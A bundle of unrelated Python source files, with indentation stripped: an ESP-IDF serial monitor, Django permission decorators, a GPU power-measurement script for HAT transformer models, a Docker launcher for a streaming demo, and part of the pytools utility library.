# also on Linux, maybe other OSes, gdb sometimes exits uncleanly and breaks the tty mode
subprocess.call(["stty", "sane"])
except Exception:
pass # don't care if there's no stty, we tried...
self.prompt_next_action("gdb exited")
def output_enable(self, enable):
self._output_enabled = enable
def output_toggle(self):
self._output_enabled = not self._output_enabled
yellow_print("\nToggle output display: {}, Type Ctrl-T Ctrl-Y to show/disable output again.".format(self._output_enabled))
def toggle_logging(self):
if self._log_file:
self.stop_logging()
else:
self.start_logging()
def start_logging(self):
if not self._log_file:
try:
name = "log.{}.{}.txt".format(os.path.splitext(os.path.basename(self.elf_file))[0],
datetime.datetime.now().strftime('%Y%m%d%H%M%S'))
self._log_file = open(name, "wb+")
yellow_print("\nLogging is enabled into file {}".format(name))
except Exception as e:
red_print("\nLog file {} cannot be created: {}".format(name, e))
def stop_logging(self):
if self._log_file:
try:
name = self._log_file.name
self._log_file.close()
yellow_print("\nLogging is disabled and file {} has been closed".format(name))
except Exception as e:
red_print("\nLog file cannot be closed: {}".format(e))
finally:
self._log_file = None
def _print(self, string, console_printer=None):
if console_printer is None:
console_printer = self.console.write_bytes
if self._output_enabled:
console_printer(string)
if self._log_file:
try:
if isinstance(string, type(u'')):
string = string.encode()
self._log_file.write(string)
except Exception as e:
red_print("\nCannot write to file: {}".format(e))
# don't fill-up the screen with the previous errors (probably consequent prints would fail also)
self.stop_logging()
def handle_commands(self, cmd):
if cmd == CMD_STOP:
self.console_reader.stop()
self.serial_reader.stop()
elif cmd == CMD_RESET:
self.serial.setRTS(True)
self.serial.setDTR(self.serial.dtr) # usbser.sys workaround
time.sleep(0.2)
self.serial.setRTS(False)
self.serial.setDTR(self.serial.dtr) # usbser.sys workaround
self.output_enable(True)
elif cmd == CMD_MAKE:
self.run_make("encrypted-flash" if self.encrypted else "flash")
elif cmd == CMD_APP_FLASH:
self.run_make("encrypted-app-flash" if self.encrypted else "app-flash")
elif cmd == CMD_OUTPUT_TOGGLE:
self.output_toggle()
elif cmd == CMD_TOGGLE_LOGGING:
self.toggle_logging()
elif cmd == CMD_ENTER_BOOT:
self.serial.setDTR(False) # IO0=HIGH
self.serial.setRTS(True) # EN=LOW, chip in reset
self.serial.setDTR(self.serial.dtr) # usbser.sys workaround
time.sleep(1.3) # timeouts taken from esptool.py, includes esp32r0 workaround. defaults: 0.1
self.serial.setDTR(True) # IO0=LOW
self.serial.setRTS(False) # EN=HIGH, chip out of reset
self.serial.setDTR(self.serial.dtr) # usbser.sys workaround
time.sleep(0.45) # timeouts taken from esptool.py, includes esp32r0 workaround. defaults: 0.05
self.serial.setDTR(False) # IO0=HIGH, done
else:
raise RuntimeError("Bad command data %d" % (cmd))
def main():
def _get_default_serial_port():
"""
Same logic for detecting serial port as esptool.py and idf.py: reverse sort by name and choose the first port.
"""
try:
ports = list(reversed(sorted(p.device for p in serial.tools.list_ports.comports())))
return ports[0]
except Exception:
return '/dev/ttyUSB0'
parser = argparse.ArgumentParser("idf_monitor - a serial output monitor for esp-idf")
parser.add_argument(
'--port', '-p',
help='Serial port device',
default=os.environ.get('ESPTOOL_PORT', _get_default_serial_port())
)
parser.add_argument(
'--baud', '-b',
help='Serial port baud rate',
type=int,
default=os.getenv('IDF_MONITOR_BAUD', os.getenv('MONITORBAUD', 115200)))
parser.add_argument(
'--make', '-m',
help='Command to run make',
type=str, default='make')
parser.add_argument(
'--encrypted',
help='Use encrypted targets while running make',
action='store_true')
parser.add_argument(
'--toolchain-prefix',
help="Triplet prefix to add before cross-toolchain names",
default=DEFAULT_TOOLCHAIN_PREFIX)
parser.add_argument(
"--eol",
choices=['CR', 'LF', 'CRLF'],
type=lambda c: c.upper(),
help="End of line to use when sending to the serial port",
default='CR')
parser.add_argument(
'elf_file', help='ELF file of application',
type=argparse.FileType('rb'))
parser.add_argument(
'--print_filter',
help="Filtering string",
default=DEFAULT_PRINT_FILTER)
args = parser.parse_args()
if args.port.startswith("/dev/tty."):
args.port = args.port.replace("/dev/tty.", "/dev/cu.")
yellow_print("--- WARNING: Serial ports accessed as /dev/tty.* will hang gdb if launched.")
yellow_print("--- Using %s instead..." % args.port)
serial_instance = serial.serial_for_url(args.port, args.baud,
do_not_open=True)
serial_instance.dtr = False
serial_instance.rts = False
args.elf_file.close() # don't need this as a file
# remove the parallel jobserver arguments from MAKEFLAGS, as any
# parent make is only running 1 job (monitor), so we can re-spawn
# all of the child makes we need (the -j argument remains part of
# MAKEFLAGS)
try:
makeflags = os.environ["MAKEFLAGS"]
makeflags = re.sub(r"--jobserver[^ =]*=[0-9,]+ ?", "", makeflags)
os.environ["MAKEFLAGS"] = makeflags
except KeyError:
pass # not running a make jobserver
monitor = Monitor(serial_instance, args.elf_file.name, args.print_filter, args.make, args.encrypted,
args.toolchain_prefix, args.eol)
yellow_print('--- idf_monitor on {p.name} {p.baudrate} ---'.format(
p=serial_instance))
yellow_print('--- Quit: {} | Menu: {} | Help: {} followed by {} ---'.format(
key_description(monitor.console_parser.exit_key),
key_description(monitor.console_parser.menu_key),
key_description(monitor.console_parser.menu_key),
key_description(CTRL_H)))
if args.print_filter != DEFAULT_PRINT_FILTER:
yellow_print('--- Print filter: {} ---'.format(args.print_filter))
monitor.main_loop()
if os.name == 'nt':
# Windows console stuff
STD_OUTPUT_HANDLE = -11
STD_ERROR_HANDLE = -12
# wincon.h values
FOREGROUND_INTENSITY = 8
FOREGROUND_GREY = 7
# matches the ANSI color change sequences that IDF sends
RE_ANSI_COLOR = re.compile(b'\033\\[([01]);3([0-7])m')
# list mapping the 8 ANSI colors (the indexes) to Windows Console colors
ANSI_TO_WINDOWS_COLOR = [0, 4, 2, 6, 1, 5, 3, 7]
GetStdHandle = ctypes.windll.kernel32.GetStdHandle
SetConsoleTextAttribute = ctypes.windll.kernel32.SetConsoleTextAttribute
class ANSIColorConverter(object):
"""Class to wrap a file-like output stream, intercept ANSI color codes,
and convert them into calls to Windows SetConsoleTextAttribute.
Doesn't support all ANSI terminal code escape sequences, only the sequences IDF uses.
Ironically, in Windows this console output is normally wrapped by winpty which will then detect the console text
color changes and convert these back to ANSI color codes for MSYS' terminal to display. However this is the
least-bad working solution, as winpty doesn't support any "passthrough" mode for raw output.
"""
def __init__(self, output=None, decode_output=False):
self.output = output
self.decode_output = decode_output
self.handle = GetStdHandle(STD_ERROR_HANDLE if self.output == sys.stderr else STD_OUTPUT_HANDLE)
self.matched = b''
def _output_write(self, data):
try:
if self.decode_output:
self.output.write(data.decode())
else:
self.output.write(data)
except (IOError, OSError):
# Windows 10 bug since the Fall Creators Update, sometimes writing to console randomly throws
# an exception (however, the character is still written to the screen)
# Ref https://github.com/espressif/esp-idf/issues/1163
#
# Also possible for Windows to throw an OSError error if the data is invalid for the console
# (garbage bytes, etc)
pass
def write(self, data):
if isinstance(data, bytes):
data = bytearray(data)
else:
data = bytearray(data, 'utf-8')
for b in data:
b = bytes([b])
length = len(self.matched)
if b == b'\033': # ESC
self.matched = b
elif (length == 1 and b == b'[') or (1 < length < 7):
self.matched += b
if self.matched == ANSI_NORMAL.encode('latin-1'): # reset console
# Flush is required only with Python3 - switching color before it is printed would mess up the console
self.flush()
SetConsoleTextAttribute(self.handle, FOREGROUND_GREY)
self.matched = b''
elif len(self.matched) == 7: # could be an ANSI sequence
m = re.match(RE_ANSI_COLOR, self.matched)
if m is not None:
color = ANSI_TO_WINDOWS_COLOR[int(m.group(2))]
if m.group(1) == b'1':
color |= FOREGROUND_INTENSITY
# Flush is required only with Python3 - switching color before it is printed would mess up the console
self.flush()
SetConsoleTextAttribute(self.handle, color)
else:
self._output_write(self.matched) # not an ANSI color code, display verbatim
self.matched = b''
else:
self._output_write(b)
self.matched = b''
def flush(self):
try:
self.output.flush()
except OSError:
# Account for Windows Console refusing to accept garbage bytes (serial noise, etc)
pass
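    # Illustrative behaviour of the converter (names as defined above): writing a red
    # ESP-IDF error line switches the console colour before the text and restores grey
    # on the reset sequence.
    #
    #   conv = ANSIColorConverter(sys.stdout)
    #   conv.write(ANSI_RED + "E (123) boot: failed" + ANSI_NORMAL)
    #   # -> SetConsoleTextAttribute(handle, red | FOREGROUND_INTENSITY), text written,
    #   #    then SetConsoleTextAttribute(handle, FOREGROUND_GREY) on the ANSI_NORMAL reset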
if __name__ == "__main__":
main()
|
decorators.py
|
import threading
from functools import wraps
from django.core.exceptions import PermissionDenied
def require_member(func):
@wraps(func)
def inner(request, *args, **kwargs):
if request.user_obj:
return func(request, *args, **kwargs)
else:
raise PermissionDenied('You must be an active Houston controller to access this endpoint!')
return inner
def require_session(func):
@wraps(func)
def inner(request, *args, **kwargs):
if request.session.get('vatsim_data'):
return func(request, *args, **kwargs)
else:
raise PermissionDenied('You must be logged in to access this endpoint!')
return inner
def require_staff(func):
@wraps(func)
def inner(request, *args, **kwargs):
if request.user_obj and request.user_obj.is_staff:
return func(request, *args, **kwargs)
else:
raise PermissionDenied('You must be a staff member to access this endpoint!')
return inner
def require_mentor(func):
@wraps(func)
def inner(request, *args, **kwargs):
if request.user_obj and request.user_obj.is_mentor:
return func(request, *args, **kwargs)
else:
raise PermissionDenied('You must be a mentor or instructor to access this endpoint!')
return inner
def require_staff_or_mentor(func):
@wraps(func)
def inner(request, *args, **kwargs):
if request.user_obj and (request.user_obj.is_staff or request.user_obj.is_mentor):
return func(request, *args, **kwargs)
else:
raise PermissionDenied('You must be staff, mentor, or instructor to access this endpoint!')
return inner
def require_role(role_list):
def decorator(func):
@wraps(func)
def inner(request, *args, **kwargs):
if request.user_obj and request.user_obj.main_role in role_list:
return func(request, *args, **kwargs)
else:
raise PermissionDenied('You lack the necessary role to access this endpoint!')
return inner
return decorator
def run_async(func):
@wraps(func)
def inner(*args, **kwargs):
threading.Thread(target=func, args=args, kwargs=kwargs).start()
return inner
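# Illustrative usage in a Django views module (the view names and role strings below are
# hypothetical; the decorators are the ones defined above):
#
#   @require_member
#   def roster(request):
#       ...
#
#   @require_role(['ATM', 'DATM'])      # only users whose main_role is in the list
#   def edit_facility_settings(request):
#       ...
#
#   @run_async
#   def send_welcome_email(user):
#       ...                             # runs in a background thread; the return value is discarded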
|
power_dataset.py
|
# HAT: Hardware-Aware Transformers for Efficient Natural Language Processing
# Hanrui Wang, Zhanghao Wu, Zhijian Liu, Han Cai, Ligeng Zhu, Chuang Gan and Song Han
# The 58th Annual Meeting of the Association for Computational Linguistics (ACL), 2020.
# Paper: https://arxiv.org/abs/2005.14187
# Project page: https://hanruiwang.me/project_pages/hat/
import torch
import time
import pdb
import numpy as np
from fairseq import checkpoint_utils, distributed_utils, options, tasks, utils
from tqdm import tqdm
import threading
import pynvml
def main(args):
utils.import_user_module(args)
assert args.max_tokens is not None or args.max_sentences is not None, \
'Must specify batch size either with --max-tokens or --max-sentences'
# Initialize CUDA and distributed training
if torch.cuda.is_available() and not args.cpu:
torch.cuda.set_device(args.device_id)
torch.manual_seed(args.seed)
# Print args
print(args)
# Setup task
task = tasks.setup_task(args)
# Build model
model = task.build_model(args)
print(model)
    # specify the length of the dummy input for profiling
    # for iwslt the average length is 23, for wmt it is 30
dummy_sentence_length_dict = {'iwslt': 23, 'wmt': 30}
if 'iwslt' in args.arch:
dummy_sentence_length = dummy_sentence_length_dict['iwslt']
elif 'wmt' in args.arch:
dummy_sentence_length = dummy_sentence_length_dict['wmt']
else:
raise NotImplementedError
dummy_src_tokens = [2] + [7] * (dummy_sentence_length - 1)
dummy_prev = [7] * (dummy_sentence_length - 1) + [2]
# for power predictor: power dataset generation
with open(args.lat_dataset_path, 'w') as fid:
src_tokens_test = torch.tensor([dummy_src_tokens], dtype=torch.long)
src_lengths_test = torch.tensor([dummy_sentence_length])
prev_output_tokens_test_with_beam = torch.tensor([dummy_prev] * args.beam, dtype=torch.long)
if args.latcpu:
model.cpu()
print('Measuring model power on CPU for dataset generation...')
elif args.latgpu:
model.cuda()
src_tokens_test = src_tokens_test.cuda()
src_lengths_test = src_lengths_test.cuda()
prev_output_tokens_test_with_beam = prev_output_tokens_test_with_beam.cuda()
src_tokens_test.get_device()
print('Measuring model power on GPU for dataset generation...')
start = torch.cuda.Event(enable_timing=True)
end = torch.cuda.Event(enable_timing=True)
feature_info = utils.get_feature_info()
fid.write(','.join(feature_info) + ',')
power_info = ['power_mean_encoder', 'power_mean_decoder', 'power_std_encoder', 'power_std_decoder']
fid.write(','.join(power_info) + '\n')
for i in range(args.lat_dataset_size):
print(i)
config_sam = utils.sample_configs(utils.get_all_choices(args), reset_rand_seed=False, super_decoder_num_layer=args.decoder_layers)
features = utils.get_config_features(config_sam)
fid.write(','.join(map(str, features)) + ',')
model.set_sample_config(config_sam)
# dry runs
for _ in range(5):
encoder_out_test = model.encoder(src_tokens=src_tokens_test, src_lengths=src_lengths_test)
encoder_powers = []
print('Measuring encoder for dataset generation...')
for _ in tqdm(range(args.latiter)):
if args.latgpu:
start.record()
elif args.latcpu:
start = time.time()
powers = []
pynvml.nvmlInit()
handle = pynvml.nvmlDeviceGetHandleByIndex(1)
thread_encoder = threading.Thread(target=model.encoder, args=(src_tokens_test, src_lengths_test))
thread_encoder.start()
while(thread_encoder.is_alive()):
powers.append(pynvml.nvmlDeviceGetPowerUsage(handle))
time.sleep(0.001)
pynvml.nvmlShutdown()
power = np.average(powers)
if args.latgpu:
end.record()
torch.cuda.synchronize()
encoder_powers.append(power/1000)  # nvml reports mW; store the result in W
if not args.latsilent:
print('Encoder one run on GPU (for dataset generation): ', power/1000)
elif args.latcpu:
end = time.time()
encoder_powers.append(power)
if not args.latsilent:
print('Encoder one run on CPU (for dataset generation): ', power)
# only use the 10% to 90% powers to avoid outliers
encoder_powers.sort()
encoder_powers = encoder_powers[int(args.latiter * 0.1): -max(1, int(args.latiter * 0.1))]
print(f'Encoder power for dataset generation: Mean: {np.mean(encoder_powers)} W; \t Std: {np.std(encoder_powers)} W')
bsz = 1
new_order = torch.arange(bsz).view(-1, 1).repeat(1, args.beam).view(-1).long()
if args.latgpu:
new_order = new_order.cuda()
encoder_out_test_with_beam = model.encoder.reorder_encoder_out(encoder_out_test, new_order)
# dry runs
for _ in range(5):
model.decoder(prev_output_tokens=prev_output_tokens_test_with_beam,
encoder_out=encoder_out_test_with_beam)
# the decoder is more involved: we need to handle incremental states and auto-regressive decoding
decoder_iterations_dict = {'iwslt': 23, 'wmt': 30}
if 'iwslt' in args.arch:
decoder_iterations = decoder_iterations_dict['iwslt']
elif 'wmt' in args.arch:
decoder_iterations = decoder_iterations_dict['wmt']
decoder_powers = []
print('Measuring decoder for dataset generation...')
for _ in tqdm(range(args.latiter)):
if args.latgpu:
start.record()
elif args.latcpu:
start = time.time()
powers = []
pynvml.nvmlInit()
handle = pynvml.nvmlDeviceGetHandleByIndex(1)  # NOTE: samples the GPU at index 1; adjust if the model runs on another device
incre_states = {}
for k_regressive in range(decoder_iterations):
thread_decoder = threading.Thread(target=model.decoder, args=((prev_output_tokens_test_with_beam[:, :k_regressive + 1], encoder_out_test_with_beam, incre_states)))
thread_decoder.start()
while(thread_decoder.is_alive()):
powers.append(pynvml.nvmlDeviceGetPowerUsage(handle))
time.sleep(0.001)
pynvml.nvmlShutdown()
# print(powers)
power = np.average(powers)
if args.latgpu:
end.record()
torch.cuda.synchronize()
decoder_powers.append(power/1000)  # nvml reports mW; store the result in W
if not args.latsilent:
print('Decoder one run on GPU (for dataset generation): ', power/1000)
elif args.latcpu:
end = time.time()
decoder_powers.append(power)
if not args.latsilent:
print('Decoder one run on CPU (for dataset generation): ', power)
# only use the 10% to 90% powers to avoid outliers
decoder_powers.sort()
decoder_powers = decoder_powers[int(args.latiter * 0.1): -max(1, int(args.latiter * 0.1))]
print(decoder_powers)
print(f'Decoder power for dataset generation: Mean: {np.mean(decoder_powers)} W; \t Std: {np.std(decoder_powers)} W')
lats = [np.mean(encoder_powers), np.mean(decoder_powers), np.std(encoder_powers), np.std(decoder_powers)]
fid.write(','.join(map(str, lats)) + '\n')
def cli_main():
parser = options.get_training_parser()
parser.add_argument('--latgpu', action='store_true', help='measure SubTransformer power on GPU')
parser.add_argument('--latcpu', action='store_true', help='measure SubTransformer power on CPU')
parser.add_argument('--latiter', type=int, default=300, help='how many iterations to run when measuring power')
parser.add_argument('--latsilent', action='store_true', help='keep silent when measuring power')
parser.add_argument('--lat-dataset-path', type=str, default='./power_dataset/lat.tmp', help='the path to write power dataset')
parser.add_argument('--lat-dataset-size', type=int, default=200, help='number of data points for the dataset')
options.add_generation_args(parser)
args = options.parse_args_and_arch(parser)
if args.latcpu:
args.cpu = True
args.fp16 = False
if args.pdb:
pdb.set_trace()
main(args)
if __name__ == '__main__':
cli_main()
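# A hedged example invocation (a sketch only; the data path and --arch value below are
# illustrative placeholders for a fairseq/HAT setup, not taken from this repository):
#   python power_dataset.py /path/to/binarized/wmt_data \
#       --arch transformersuper_wmt_en_de --latgpu --latiter 100 \
#       --lat-dataset-path ./power_dataset/wmt_gpu.csv --lat-dataset-size 200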
|
init.py
|
import docker
from docker.models.images import Image
from docker.models.containers import _create_container_args
import yaml
import shutil
from multiprocessing import Process, Queue
from distutils.dir_util import copy_tree
import sys, os, time
from pathlib import Path
from jinja2 import Template
def build_image(docker_client, host_url, index_jinja_path, dockerfile_path, image_tag):
with open(index_jinja_path) as f:
raw_template = f.read()
index_template = Template(raw_template)
output_path = index_jinja_path.split('.j2')[0]
index_string = index_template.render(host=host_url)
with open(output_path, 'w') as f:
f.write(index_string)
try:
image, _ = docker_client.images.build(path=".", dockerfile=dockerfile_path, tag=image_tag, rm=True)
return image
except docker.errors.BuildError as e:
for line in e.build_log:
if 'stream' in line:
print(line)
raise e
def run_container(client, image, algorithmia_api_key, algorithmia_api_address, mode, local_aws=False, networking=False):
raw_args = {}
if isinstance(image, Image):
image = image.id
raw_args['image'] = image
raw_args['version'] = client.containers.client.api._version
home_dir = str(Path.home())
aws_dir = os.path.join(home_dir, ".aws")
if networking and local_aws:
raw_args['ports'] = {80: 80}
container_args = _create_container_args(raw_args)
container_args['host_config'] = client.api.create_host_config(port_bindings={80: ("0.0.0.0", 80)},
binds={aws_dir: {'bind': "/root/.aws", "mode": "ro"}})
container_args['volumes'] = ["/root/.aws"]
elif networking:
raw_args['ports'] = {80: 80}
container_args = _create_container_args(raw_args)
container_args['host_config'] = client.api.create_host_config(port_bindings={80: ("0.0.0.0", 80)})
elif local_aws:
container_args = _create_container_args(raw_args)
container_args['host_config'] = client.api.create_host_config(binds={aws_dir: {'bind': "/root/.aws", "mode": "ro"}})
container_args['volumes'] = ["/root/.aws"]
else:
container_args = _create_container_args(raw_args)
container_args['detach'] = True
container_args['environment'] = {}
container_args['environment']['ALGORITHMIA_API_KEY'] = algorithmia_api_key
container_args['environment']['ALGORITHMIA_API_ADDRESS'] = algorithmia_api_address
container_args['environment']['MODE'] = mode
resp = client.api.create_container(**container_args)
client.api.start(resp['Id'])
return resp['Id']
def stop_and_kill_containers(docker_client, all=False):
"""
Force-removes docker containers. If *all* is True, removes every container whether running or not; otherwise only running ones.
:param docker_client: The docker python client
:param all: Boolean variable defining whether we destroy 'all' docker containers, or just running ones
:return: None
"""
containers = docker_client.containers.list(all=all, ignore_removed=True)
for container in containers:
try:
container.remove(force=True)
except docker.errors.APIError:
pass
def kill_dangling_images(docker_client):
"""
Removes all dangling (untagged) images to free up disk space
:param docker_client: The docker python client
:return: None
"""
images = docker_client.images.list()
for image in images:
if len(image.tags) == 0:
docker_client.images.remove(image.id, force=True)
def copy_aws_dir():
print("copying creds")
home_path = os.getenv("HOME", None)
aws_cred_path = os.path.join(home_path, ".aws")
copy_tree(aws_cred_path, ".aws")
def get_log_and_push(logger, queue, name):
for message in logger:
message = str(message, 'utf-8')
messages_split = message.split('\n')[0:-1]
for message in messages_split:
queue.put("{} - {}".format(name, message))
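# A minimal sketch of the expected config.yaml layout. The key names are inferred from the
# checks in the __main__ block below; all values here are illustrative placeholders.
#
#   aws:
#     credentials:
#       IAM:
#         local_iam: true
#   algorithmia:
#     api_key: "YOUR_API_KEY"
#     api_address: "https://api.algorithmia.com"
#   video:
#     host: "http://localhost"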
client = docker.from_env()
if __name__ == "__main__":
try:
if len(sys.argv) > 1:
mode = str(sys.argv[1])
else:
mode = None
with open('config.yaml') as f:
data = yaml.safe_load(f)
if 'aws' in data and 'credentials' in data['aws']:
creds = data['aws']['credentials']
if 'IAM' in creds and isinstance(creds['IAM'], dict) and 'local_iam' in creds['IAM']:
copy_aws_dir()
local_credentials = True
else:
local_credentials = False
else:
raise Exception("your 'config.yaml' file is misconfigured around 'aws'")
if 'algorithmia' in data and ('api_key' in data['algorithmia'] and 'api_address' in data['algorithmia']):
api_key = data['algorithmia']['api_key']
api_address = data['algorithmia']['api_address']
else:
raise Exception("your 'config.yaml' file is misconfigured around 'algorithmia'")
if 'video' in data and isinstance(data['video'], dict):
host = data['video']['host']
else:
raise Exception("your 'config.yaml' file is misconfigured around 'video'")
image = build_image(client, host, "src/www/index.html.j2", "Dockerfile", "streaming")
if mode:
if mode == "generate":
container = run_container(client, image, api_key, api_address, "generate", local_aws=local_credentials)
elif mode == "process":
container = run_container(client, image, api_key, api_address, "process", local_aws=local_credentials)
elif mode == "broadcast":
container = run_container(client, image, api_key, api_address, "broadcast", local_aws=local_credentials,
networking=True)
else:
raise Exception(
"variable passed to init.py was {}, must be 'generate', 'process', or 'broadcast'".format(mode))
logger = client.api.attach(container, stream=True, logs=True, stdout=True, stderr=True)
for msg in logger:
print(str(msg, 'utf-8'))
else:
logging_queue = Queue()
generator = run_container(client, image, api_key, api_address, "generate", local_aws=local_credentials)
processor = run_container(client, image, api_key, api_address, "process", local_aws=local_credentials)
broadcaster = run_container(client, image, api_key, api_address, "broadcast", local_aws=local_credentials, networking=True)
streams = [(container_name, client.api.attach(container, stdout=True, logs=True, stderr=True, stream=True))
for
container_name, container in
[("generate", generator), ("process", processor), ("broadcast", broadcaster)]]
threads = [Process(target=get_log_and_push, args=(stream, logging_queue, name)) for name, stream in streams]
[thread.start() for thread in threads]
print("streaming started, connecting to containers")
while True:
if logging_queue.empty():
time.sleep(0.25)
else:
msg = logging_queue.get()
print(msg)
except KeyboardInterrupt as e:
print("killing")
stop_and_kill_containers(client, True)
path = os.path.join(os.getcwd(), '.aws')
if os.path.exists(path):
shutil.rmtree(path, ignore_errors=True)
except Exception as e:
print("killing")
stop_and_kill_containers(client, True)
path = os.path.join(os.getcwd(), '.aws')
if os.path.exists(path):
shutil.rmtree(path, ignore_errors=True)
raise e
|
__init__.py
|
# pylint: disable=too-many-lines
# (Yes, it has a point!)
__copyright__ = """
Copyright (C) 2009-2013 Andreas Kloeckner
Copyright (C) 2020 Matt Wala
"""
__license__ = """
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import re
from functools import reduce, wraps
import operator
import sys
import logging
from typing import (
Any, Callable, Dict, Hashable, Iterable,
List, Optional, Set, Tuple, TypeVar)
import builtins
from sys import intern
# These are deprecated and will go away in 2022.
all = builtins.all
any = builtins.any
__doc__ = """
A Collection of Utilities
=========================
Math
----
.. autofunction:: levi_civita
.. autofunction:: perm
.. autofunction:: comb
Assertive accessors
-------------------
.. autofunction:: one
.. autofunction:: is_single_valued
.. autofunction:: all_roughly_equal
.. autofunction:: single_valued
Memoization
-----------
.. autofunction:: memoize
.. autofunction:: memoize_on_first_arg
.. autofunction:: memoize_method
.. autofunction:: memoize_in
.. autofunction:: keyed_memoize_on_first_arg
.. autofunction:: keyed_memoize_method
.. autofunction:: keyed_memoize_in
Argmin/max
----------
.. autofunction:: argmin2
.. autofunction:: argmax2
.. autofunction:: argmin
.. autofunction:: argmax
Cartesian products
------------------
.. autofunction:: cartesian_product
.. autofunction:: distinct_pairs
Permutations, Tuples, Integer sequences
---------------------------------------
.. autofunction:: wandering_element
.. autofunction:: generate_nonnegative_integer_tuples_below
.. autofunction:: generate_nonnegative_integer_tuples_summing_to_at_most
.. autofunction:: generate_all_integer_tuples_below
.. autofunction:: generate_permutations
.. autofunction:: generate_unique_permutations
Formatting
----------
.. autoclass:: Table
.. autofunction:: string_histogram
.. autofunction:: word_wrap
Debugging
---------
.. autofunction:: typedump
.. autofunction:: invoke_editor
Progress bars
-------------
.. autoclass:: ProgressBar
Name generation
---------------
.. autofunction:: generate_unique_names
.. autofunction:: generate_numbered_unique_names
.. autoclass:: UniqueNameGenerator
Deprecation Warnings
--------------------
.. autofunction:: deprecate_keyword
Functions for dealing with (large) auxiliary files
--------------------------------------------------
.. autofunction:: download_from_web_if_not_present
Helpers for :mod:`numpy`
------------------------
.. autofunction:: reshaped_view
Timing data
-----------
.. autoclass:: ProcessTimer
Log utilities
-------------
.. autoclass:: ProcessLogger
.. autoclass:: DebugProcessLogger
.. autoclass:: log_process
Sorting in natural order
------------------------
.. autofunction:: natorder
.. autofunction:: natsorted
Backports of newer Python functionality
---------------------------------------
.. autofunction:: resolve_name
Hashing
-------
.. autofunction:: unordered_hash
Sampling
--------
.. autofunction:: sphere_sample_equidistant
.. autofunction:: sphere_sample_fibonacci
Type Variables Used
-------------------
.. class:: T
Any type.
.. class:: F
Any callable.
"""
# {{{ type variables
T = TypeVar("T")
F = TypeVar("F", bound=Callable[..., Any])
# }}}
# {{{ code maintenance
class MovedFunctionDeprecationWrapper:
def __init__(self, f, deadline=None):
if deadline is None:
deadline = "the future"
self.f = f
self.deadline = deadline
def __call__(self, *args, **kwargs):
from warnings import warn
warn(f"This function is deprecated and will go away in {self.deadline}. "
f"Use {self.f.__module__}.{self.f.__name__} instead.",
DeprecationWarning, stacklevel=2)
return self.f(*args, **kwargs)
def deprecate_keyword(oldkey: str,
newkey: Optional[str] = None, *,
deadline: Optional[str] = None):
"""Decorator used to deprecate function keyword arguments.
:arg oldkey: deprecated argument name.
:arg newkey: new argument name that serves the same purpose, if any.
:arg deadline: expected time frame for the removal of the deprecated argument.
"""
from warnings import warn
if deadline is None:
deadline = "the future"
def wrapper(func):
@wraps(func)
def inner_wrapper(*args, **kwargs):
if oldkey in kwargs:
if newkey is None:
warn(f"The '{oldkey}' keyword is deprecated and will "
f"go away in {deadline}.",
DeprecationWarning, stacklevel=2)
else:
warn(f"The '{oldkey}' keyword is deprecated and will "
f"go away in {deadline}. "
f"Use '{newkey}' instead.",
DeprecationWarning, stacklevel=2)
if newkey in kwargs:
raise ValueError(f"Cannot use '{oldkey}' "
f"and '{newkey}' in the same call.")
kwargs[newkey] = kwargs[oldkey]
del kwargs[oldkey]
return func(*args, **kwargs)
return inner_wrapper
return wrapper
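# A brief usage sketch for deprecate_keyword (illustrative names only):
#
#     @deprecate_keyword("alpha", "relaxation", deadline="2024")
#     def solve(matrix, relaxation=1.0):
#         ...
#
#     solve(mat, alpha=0.5)   # warns, then forwards the value as relaxation=0.5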
# }}}
# {{{ math
def delta(x, y):
if x == y:
return 1
else:
return 0
def levi_civita(tup):
"""Compute an entry of the Levi-Civita tensor for the indices *tuple*."""
if len(tup) == 2:
i, j = tup
return j-i
if len(tup) == 3:
i, j, k = tup
return (j-i)*(k-i)*(k-j)/2
else:
raise NotImplementedError
def factorial(n):
from operator import mul
assert n == int(n)
return reduce(mul, (i for i in range(1, n+1)), 1)
def perm(n, k):
"""Return P(n, k), the number of permutations of length k drawn from n
choices.
"""
result = 1
assert k > 0
while k:
result *= n
n -= 1
k -= 1
return result
def comb(n, k):
"""Return C(n, k), the number of combinations (subsets)
of length k drawn from n choices.
"""
return perm(n, k)//factorial(k)
def norm_1(iterable):
return sum(abs(x) for x in iterable)
def norm_2(iterable):
return sum(x**2 for x in iterable)**0.5
def norm_inf(iterable):
return max(abs(x) for x in iterable)
def norm_p(iterable, p):
return sum(i**p for i in iterable)**(1/p)
class Norm:
def __init__(self, p):
self.p = p
def __call__(self, iterable):
return sum(i**self.p for i in iterable)**(1/self.p)
# }}}
# {{{ data structures
# {{{ record
class RecordWithoutPickling:
"""An aggregate of named sub-variables. Assumes that each record sub-type
will be individually derived from this class.
"""
__slots__: List[str] = []
def __init__(self, valuedict=None, exclude=None, **kwargs):
assert self.__class__ is not Record
if exclude is None:
exclude = ["self"]
try:
fields = self.__class__.fields
except AttributeError:
self.__class__.fields = fields = set()
if valuedict is not None:
kwargs.update(valuedict)
for key, value in kwargs.items():
if key not in exclude:
fields.add(key)
setattr(self, key, value)
def get_copy_kwargs(self, **kwargs):
for f in self.__class__.fields:
if f not in kwargs:
try:
kwargs[f] = getattr(self, f)
except AttributeError:
pass
return kwargs
def copy(self, **kwargs):
return self.__class__(**self.get_copy_kwargs(**kwargs))
def __repr__(self):
return "{}({})".format(
self.__class__.__name__,
", ".join(f"{fld}={getattr(self, fld)!r}"
for fld in self.__class__.fields
if hasattr(self, fld)))
def register_fields(self, new_fields):
try:
fields = self.__class__.fields
except AttributeError:
self.__class__.fields = fields = set()
fields.update(new_fields)
def __getattr__(self, name):
# This method is implemented to avoid pylint 'no-member' errors for
# attribute access.
